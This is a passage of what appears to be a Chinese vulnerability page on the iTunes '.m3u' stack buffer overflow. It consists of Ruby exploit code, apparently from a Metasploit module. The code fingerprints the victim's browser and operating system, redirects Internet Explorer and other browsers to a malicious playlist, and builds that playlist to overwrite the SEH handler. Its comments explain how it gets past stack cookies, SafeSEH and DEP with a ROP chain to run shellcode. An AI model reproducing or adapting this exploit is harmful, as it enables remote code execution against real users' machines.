Apple iTunes '.m3u'文件远程栈缓冲区溢出漏洞(3)

        if request.uri =~ /\.ico$/i
            # Discard requests for ico files
            send_not_found(cli)
        #elsif agent =~ /iTunes\/10.6.1/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
        elsif agent =~ /iTunes/ and agent =~ /Windows XP Professional Service Pack 3/ and request.uri =~ /\.m3u$/i
            # exploit iTunes (<= 10.6.1.7) on Windows XP SP3
            send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
            status(request,cli,"Sending playlist")
        elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
            # redirect MSIE to iTunes link
            send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
            status(request,cli,"Redirecting to playlist")
        elsif agent =~ /NT 5\.1/
            # redirect Firefox, Chrome, Opera, Safari to iTunes link
            send_redirect(cli, m3u_location)
            status(request,cli,"Redirecting to playlist")
        else
            send_not_found(cli)
            print_status("Unknown User-Agent. Sending 404")
        end

end

# IE did not proper redirect when retrieving an itms:// location redirect via a HTTP header...
    # ... so use html

def generate_redirect_ie(m3u_location)

ie_redir = <<-HTML_REDIR
            <!DOCTYPE HTML>
            <html>
            <head>
            <meta http-equiv="refresh" content="0; URL=#{m3u_location}">
            </head>
            </html>
        HTML_REDIR

return ie_redir

end

# create the malicious playlist

def generate_m3u(payload)

# Bypass stack cookies by triggering a SEH exception before
        # the cookie gets checked. SafeSEH is bypassed by using a non
        # safeSEH DLL [QuickTime.qts v7.7.2]. DEP is bypassed by using ROP.

# stack buffer overflow ->
        # overwrite SEH handler ->
        # trigger SEH exception ->
        # rewind stack (ADD ESP, ...) and land in ROP NOP sled  ->
        # virtualprotect and execute shellcode

target = targets[0]

m3u = '#EXTINF:,'

# stack layout depends on what iTunes is doing (running or not, playing music etc.) ...
        # ... so ensure we overwrite a SEH handler to get back to our rop chain
        m3u << [target['SEH']].pack("V") * 0x6a       # stack pivot/rewind
        m3u << [target['ROP_NOP']].pack("V") * 30     # ROP NOP sled
        m3u << gimme_rop
        m3u << payload

# 0x1000 should be enough to overflow the stack and trigger SEH
        m3u << rand_text_alphanumeric(0x1000 - m3u.length)

return m3u

end